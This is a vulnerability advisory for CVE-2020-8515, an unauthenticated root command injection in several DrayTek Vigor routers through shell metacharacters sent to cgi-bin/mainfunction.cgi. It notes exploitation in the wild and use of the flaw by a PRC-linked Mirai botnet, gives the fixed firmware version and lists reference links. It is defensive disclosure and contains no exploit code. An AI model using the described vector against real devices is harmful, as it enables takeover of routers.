Draytek Vigor Series (Multiple Devices) - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CVE-2020-8515)

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.

Threat Landscape & Known Exploitation

This vulnerability was reported by GreyNoise to have been exploited 'in the wild' during March 2025.

NOTE: The FBI, CNMF, NSA, NCSC and other national cybersecurity agencies have as of September 2024 issued a joint cybersecurity alert regarding the compromise of up to 260,000 Internet-connected devices in a campaign by Chinese (PRC)-linked cyber actors. The threat actors used a network of compromised nodes (a “botnet”) as a proxy to conceal their identities while deploying distributed denial of service (DDoS) attacks or compromising targeted networks in the West. The botnet uses a customized variant of the 'Mirai' family of malware as a component of a system that automates the hijack of devices including SOHO routers, firewalls and NAS devices. Compromise of the device is achieved via the exploit of over 60 known and catalogued vulnerabilities, of which this CVE is one. Full details are available via the published NSA report.

This issue has been fixed in Vigor3900/2960/300B v1.5.1. Update to the latest version.

• http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html

• https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html

• https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/

• https://www.securityweek.com/vulnerability-exploitation-possibly-behind-widespread-draytek-router-reboots/

• https://www.greynoise.io/blog/in-the-wild-activity-against-draytek-routers